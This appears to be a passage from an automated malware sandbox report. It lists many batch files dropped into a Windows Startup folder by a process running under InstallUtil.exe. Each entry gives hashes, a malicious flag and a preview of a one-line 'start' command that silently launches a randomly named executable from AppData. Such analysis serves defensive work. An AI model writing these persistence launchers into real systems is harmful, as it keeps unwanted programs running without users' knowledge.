                                                                                                                                                                                                                                SHA1:E33B33969537B7ABE094B502BD63ECBE452BA360
                                                                                                                                                                                                                                SHA-256:445BF8872FD7AA488E3BE3D79A8769405D851B4B766088449171C8DF4142CD53
                                                                                                                                                                                                                                SHA-512:B1EF417F18B68B37E089AE797F7F1338D3EEE1E2A04EAC8CE391284BE11B14B7DE66CAE46EE7EFC68681DB513750D1B00E9C6B477324CFD8C92D5E4DB2912606
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\kO0savj64UXXAiEut7imvfm6.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JZs2BdtaVoF2513D2RlX46qg.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.901924385998554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WE8nGdJSkdan:fE1wkn23WHD
                                                                                                                                                                                                                                MD5:17DFD507462F8EF632B7A0A1FBD372F5
                                                                                                                                                                                                                                SHA1:E3B717B64CFB3308C66BDB7CA9A570B35DF67BCE
                                                                                                                                                                                                                                SHA-256:9B5BCB13A32C7DE6061945A37C42B8E7A25F378C606E6AF75C0306CF882C00A9
                                                                                                                                                                                                                                SHA-512:7C1D4D351933FA5656374C5492B37CA0ED1B43016ADCDF783FAE6E93B7DAC6A03A90DCCB44DFEF712AB6702D786AF0E8BE432B32313CCAC7929C4B59843D95E5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3TgecgfsPBFevp0C7lLcJJOk.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFn3QrubYABzdRE1O31cNxVg.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.950925862851686
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J59GlDh1RLcS:fE1wkn234DxcS
                                                                                                                                                                                                                                MD5:F362EB6992C0A93078B2E66625A9FA0B
                                                                                                                                                                                                                                SHA1:2C9D2FD1484DDA3CDDCA6244B3DF73D16CFC047F
                                                                                                                                                                                                                                SHA-256:8376E9C3EECA08D28D555EF663B2A41914CD85E492D042EA7F32E3EA22E944AD
                                                                                                                                                                                                                                SHA-512:E1FE507EC3FE699D138E0C950C4CFC10612D8E54DCBCDA97E2286A9D56B2F9B1B6E92128A150ABB76DBEA704BD496FAC5B10D3339DEC93FDA12D0C92566B60A0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\XcjiyfDAp1xg32d0IyIg2zMk.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L60mOnprETYU8PVSXxv1TKgu.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.887492604855811
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5pkURuRb6ykdan:fE1wkn2310Rb6yD
                                                                                                                                                                                                                                MD5:D2D3F4E88727A209BFCE41BE178F17EC
                                                                                                                                                                                                                                SHA1:6DFF831DC4C132FE50B4E32CE0105B60F3D53078
                                                                                                                                                                                                                                SHA-256:131BD0DE81030219847FB79C689B733452EE4177F1C52B67FA18079ABF115405
                                                                                                                                                                                                                                SHA-512:409FD5B2324A9451CCA05D9F45DD01B515D54B865018CDDE521C93F83D081E74E0514676DBDCFC0C278057272B32423A0A082F361AC8898E95E9D16425AB7CF3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\LAuOzs2TVXyzss3wQ1slqfrw.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lo2UTsMDlN4zzEXKzfmqog6U.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558926
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5NMPPbctWmLZl:fE1wkn23U0Zl
                                                                                                                                                                                                                                MD5:82500D66B99D57993D6F5B86FD949DE4
                                                                                                                                                                                                                                SHA1:057D5D6B5385A9F43BA6F92F47FD2BC4FB445F43
                                                                                                                                                                                                                                SHA-256:B1EFD4B709B1AAECB4B8C5F16FC553C21727450C38EF7F97E5F4DFEAB4A6C33C
                                                                                                                                                                                                                                SHA-512:2DC228D1BBD32D80B7349B473DF1FCD0BFBD0F30DC3E0A42A41496E4FB8DBD7DF9941B49AC5499BD1DF57A9DCF8E673A11082CD45A3C116110C8D908639959A3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\hi1kLmvmLjmGV9XJZsoarSnr.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MD3aZCK2o3gddU7wGrkeXuBH.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.934575563902772
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5faT8Vrj5q4AlIkdan:fE1wkn23DVU4/D
                                                                                                                                                                                                                                MD5:3B3B57A16EC3BA64E9F22BAFDBE44BB8
                                                                                                                                                                                                                                SHA1:F8C3D5B1D58FEB4B88D8794518B3F9F7A9E6212F
                                                                                                                                                                                                                                SHA-256:A0DAFD92F44BA74961752D062B58DCC9F991DC3960B0C9E128ACD2D64B76C6AB
                                                                                                                                                                                                                                SHA-512:564B18FBF8F9113B83FECCE38233F1873F88FAC057FA0C280C2137942B908F9B44339C57D560F4684A62B8422ED94871E893D436776F3B9C1AA668B725300F98
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MVSTH2OU1514cyfdjHdKKLX6.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.0402397306175155
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5TOhNRT/JHykdan:fE1wkn236hNRTJyD
                                                                                                                                                                                                                                MD5:399C793E3D4A1A880E4324742C42E8B8
                                                                                                                                                                                                                                SHA1:D4B3F2F4437D3B46944AE8A379B892D8200F27A7
                                                                                                                                                                                                                                SHA-256:13B7C682BD3A607263E48D4FDB910CC1E2CB8560A590191526929FF9B3A2D3AB
                                                                                                                                                                                                                                SHA-512:5A5BA0D2982494A4F37CE4AFAAD74EA613B570F8F4012A139520587FEEF65D3AB40C0A80C08F8ACEC974959255DCB722CBD6BA24830F49FA99F003C71730716C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6Q8Wwld29CZNDuak3WcfH07i.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N4oRjvZiiIUiuyH7qY2tJVxP.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.968970971515983
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J59IdC9GPMpfD4iFn:fE1wkn23DYMpr
                                                                                                                                                                                                                                MD5:69C903D8871AAC7F60037DDFAB47D61F
                                                                                                                                                                                                                                SHA1:77B9EB1655AB898804AAD92979E14FC899295AD4
                                                                                                                                                                                                                                SHA-256:E0C1C1715ED2410C97DDED81243A5573CFB1F59B49B9D05D4F45CC38FBF3F17A
                                                                                                                                                                                                                                SHA-512:A8233B41104140AADA45B09731A5225983FEB1273034BE97ED4BB8FCCF2F62557F9F679B09CD4BA352DBB91D29C3FBAFFB7EA5AC26AF678E3A93CD03D4A3A211
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Xm54wLBRTMA3iYcjiLbASkwx.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OOHyKTaNRs5i380w7sfoSTrE.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.973181030290669
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5oQFd9S1UcgVLHSLNHFn:fE1wkn23oW/SecQcHF
                                                                                                                                                                                                                                MD5:9D10D5384B06A68AC0034D4A95D9EED1
                                                                                                                                                                                                                                SHA1:7ED1A78E236515776BED7846432EE51981F57936
                                                                                                                                                                                                                                SHA-256:4827155C9C91C7F2AC61392465B3631102CE9E396549B401587142F8FDBFF0CD
                                                                                                                                                                                                                                SHA-512:097F3AC8D7A7DFB144CDFDC58FC1876E03F5098FE81F76B8F64B646C7834A22346BEE565E8970F240D6F11D6937976226DD3F98780792E4BCF8AE2438822FD9B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\M6twW38X7sVJZxeigqyEpnb7.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OeHnvNY8j0wZg74Dxkl5QDpP.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526515
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5PpdqIx7hJFn:fE1wkn23BUIpvF
                                                                                                                                                                                                                                MD5:61C9AF3F2668AA285F5EFC1B3E9B0E72
                                                                                                                                                                                                                                SHA1:971BB979A1C056A0BD6EB6903465B89DB6595FA6
                                                                                                                                                                                                                                SHA-256:C3C2A048693B18D857CC78AE3F6FD844C3B1D9CCED7D3705639454E8FF0C1870
                                                                                                                                                                                                                                SHA-512:F836795B449CF998C58DBAC049AE700C614B3D29D107020FDBCB0E162B1F68223EF64EF5BBB701D772097CB343F17D0546544F165E0882C119416C16D4813B04
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\jF6qc598AF3P3yZTYHAMeb77.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OksJDIkSk9vlxiJRjwqOvBEl.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.951300233126511
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Rzo8AE7cKjHFn:fE1wkn23VV9cKjl
                                                                                                                                                                                                                                MD5:F3F2B5646868BD27F7C8AF667CCB2D0D
                                                                                                                                                                                                                                SHA1:359DED8524FA752E884542232FE877F665CA7ED4
                                                                                                                                                                                                                                SHA-256:826F2A5CF8B7A4E1590478D1A953747BCC75F47CB8CED8C9B0BBDE8B99287B11
                                                                                                                                                                                                                                SHA-512:0CCE11D28FB7351AF37E6446345B8787C31D2147345CBC55D85E867EC071923F6E824AD9A31A354A327AEBE9080EABC114A6746021D2E84A35B6832938BF8AD0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\4VMsRle8WT7FgN9W5d7QyVrl.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqCKxxB7rjibzQ1Dve4DDO9p.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.956583247280138
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5hX1XSRGTodqOULACl:fE1wkn23BtXAqOSAs
                                                                                                                                                                                                                                MD5:5D8DB4788DDEAB6D0F3C3F740CB3E0A9
                                                                                                                                                                                                                                SHA1:BB40A512DC19D0095AA807F0952B28F02E9B12BD
                                                                                                                                                                                                                                SHA-256:F64790D60361A2662FC15BC0A4ADF6D5043D524B3BA551E6D898C960D231A607
                                                                                                                                                                                                                                SHA-512:D669E92411EB1BD4AF9E98A5B35A60B1F559ACA0C88C5F385AB027AB62B135143C4B9C8AFF0E06AE1BA1758CFC664ADD4D1A100A4A4AB90E975CE3A802A5D820
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\D2g51ebrTdw2dcv4PFU8OjS1.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P4cTa1Ex4OzvKUtjHhTKpCVV.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.932880754187389
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DUUCwzVHDUf:fE1wkn23h/tDUf
                                                                                                                                                                                                                                MD5:F1159E8CD93CAEF3C0607CA3B8DF5816
                                                                                                                                                                                                                                SHA1:2320344427CB0FC6148C9C0A3A071D538E20DADB
                                                                                                                                                                                                                                SHA-256:36C22A577696EBCF380A9585B00297CF5D60C5F27BFCA61CCA46DA6C79A9C0EE
                                                                                                                                                                                                                                SHA-512:A39FD4252A0953A3D9C3660C0F1557EB479DBA8B5622525CBDAAFF8FB6C4FE6514DD7D19367D24C99D3869F5DE5FF44136C43314ED4D1CD6B0286EB9BC20C110
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\fx3WDb5iITUt99f0bfiXKyIG.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pc0adCuCUlFy3GCkyGaXGVPu.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5jIKdJaCeukmn:fE1wkn23Dduzm
                                                                                                                                                                                                                                MD5:1C1C33646B7C087776EA7DE5C6ED15C3
                                                                                                                                                                                                                                SHA1:2CB2745CF2A300B2BA924D7840705D97FF235E94
                                                                                                                                                                                                                                SHA-256:2F2FFA20A51120A5C02ADA0A76BB6DB5B537670E6FC8983E906C0AF37C2E8DCB
                                                                                                                                                                                                                                SHA-512:89EEB6ED99A89F62E038205F1057FC997753617E9414A349D8CBC98027B3686E8CC52FCA4EDBB9690007CA512CE8E6273165B2877990D035CF02242EA549E2C4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FhrkCEo26ZJ4quT9M55j4UZC.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKgxCepPfryutV6Yrct1aQ8O.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.904269617215837
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Gu/FPf5ND/VpJF:fE1wkn23Gu1F
                                                                                                                                                                                                                                MD5:EFD457237925E08BE43F73FDBE8B6F14
                                                                                                                                                                                                                                SHA1:A9BE2B2EDA504998C712447D757A0205E68A93E3
                                                                                                                                                                                                                                SHA-256:9332C0D4C7455670A9D12E3EA4A7BF6201C33FB71D9498020F94BA16A6B2E7B7
                                                                                                                                                                                                                                SHA-512:D37A96D6C3DD92FE771349F933009EADB40646F804D0FC5E34D21B14CB90488484D2C2113D2D38212946287D4D7935112AE46C8A5C024C8D0AD63E68C782FAF3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\cOpSW0Wlkj1ce9hBfVKYpMs8.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYWpTGBqLRZXJWqN9GgXDdj4.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.938538138615841
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5KfCUrEa6T4Al:fE1wkn23K/r2
                                                                                                                                                                                                                                MD5:9185D31C204C9E4EDDD9BF4C32EFDDA8
                                                                                                                                                                                                                                SHA1:456E9D64113EB1B31CCF161187F5B93127E0203F
                                                                                                                                                                                                                                SHA-256:007F376744051CCDABC2B29F8C623FBFAB6CFC7C6D4D954C9F328A32EC9B6A14
                                                                                                                                                                                                                                SHA-512:827A9C36E1BEAA67D875B9FDF432F21D6248D70C333DE144B81BF6B8F519FE9F97DA7E4D5A18F1D72555B133BC6F170BE3DEBC223E572DB926BAB054D9FBC501
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ozEb1N3TXSloIMlhTM4yt8ow.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYl1LYI6eLuyjSz20JB30bta.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.026941986008737
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5V0T/9cwoOpZrL:fE1wkn23A9cwHrL
                                                                                                                                                                                                                                MD5:D38204950968AC047AE59FA270E2CA2E
                                                                                                                                                                                                                                SHA1:F7C1C9E4D7CF3C377D88AFD7EF5C9B614F711483
                                                                                                                                                                                                                                SHA-256:FAF2D97FA7A7F33452D53FBFCF407A8FAD23D2BA7103E919A4A8560858B7A898
                                                                                                                                                                                                                                SHA-512:6C982BCF19E1F93489300C47A36FDF3032FA9FF1D68D309074A293E171F82DC56F921BB1BC09A6D28472B6EECD1D38F315A6CC90CBEE5EA23230E27DD4159620
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\0Qv6VcY5q9X7HaSkkLJaOzxN.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QrETgkaDo3FkasRFDjM62pwJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.927597740033761
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5QQ09gpHX0cpidiF:fE1wkn23QvsHEc8diF
                                                                                                                                                                                                                                MD5:FEC81708AB4C0F4274883A986C67D21B
                                                                                                                                                                                                                                SHA1:CF58068A57FB3FB4898BFEED4A77646AD9D9632E
                                                                                                                                                                                                                                SHA-256:DECFCA1A5D06808B2FCF770B188EE6FD17569FDD317D2F4E7A67D6613D9EA531
                                                                                                                                                                                                                                SHA-512:0E423644249C55FA3F555A0EAF407918006F8CA35A284E6CE01E1771745CF1BED9B98DDF95BA8F62A47DC1C99F9AE5AD2BA2B90516C25252A99A8BC31F5C7A07
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\51lQApdWbXELTdretyNDFkhG.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QxDXJA7Z6xLrsw7t7yKiytsc.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558924
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5vROG7E1yLl:fE1wkn23pOP0l
                                                                                                                                                                                                                                MD5:BB95278939C6D731E9F4B86E02662014
                                                                                                                                                                                                                                SHA1:E97FF9F301C8DA7A7BF336258B20D58B5D2FBC5D
                                                                                                                                                                                                                                SHA-256:E026730DC1C6264F77E2756AB0472BF2FD79A5EC92FF4C6E43EA7C5062C9E728
                                                                                                                                                                                                                                SHA-512:A76DE043148DB9948CEA8640431DD16B0918381E13C17037382BD842C03112165C52E843931C6C484514A03502D9564E665AB9A1B2D46D3B938B5E3466221E71
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JuskGZco4xffB5CawcWIcxFf.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfXUKQmfKzmnBZYpPm8oOw2u.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.124838906329946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5iH7mA6ysL:fE1wkn23iCAZsL
                                                                                                                                                                                                                                MD5:C6006A8E2B0328D9ACFC44390854EA10
                                                                                                                                                                                                                                SHA1:D3848EBAF4EDEBD8FEC8E83891AD1A540D5FB54C
                                                                                                                                                                                                                                SHA-256:8331F4D213AF40BBF714572307FAAB3CBDA7C0DB4C31B044A2AE847A19F54D0A
                                                                                                                                                                                                                                SHA-512:E3078AB88DC795569F4EF61F846A845DAEA724CB480ECF6B853E79CEE62C1FC9A1E155DA246D2483204682E38C2B74ADC1513B5CEA09AA31145AC05CBD89942D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\GU2AoS4KXuNbCT975QhkMBWI.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RqL7mk3tF50auCgY9TJx4Xx5.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.755132022209267
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5KkGpVBOQbpmn:fE1wkn23KzBOQbpm
                                                                                                                                                                                                                                MD5:D0D5C9C4CE8CA1933AE5D60B5A1C02A4
                                                                                                                                                                                                                                SHA1:8E2231A80DAFA71CBA482798C84EF90CF8F33DEB
                                                                                                                                                                                                                                SHA-256:B1F0E628EB612167ECA635D45CAF5466C34DED2454CEA0C5BF38009CF6893581
                                                                                                                                                                                                                                SHA-512:3EC27EA9B33F81424C0D7AB31314B21804A4840C8C64AF5384891BCCCDE6E229AA73C6C87C5A56CDFF64EAB9ECF186A7211A52761056F864C8FDC448484F40AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\oCvcL0BwU8vcPCyx5xUoBc3Y.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RwdyRothHh6h93fgno23ysMA.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
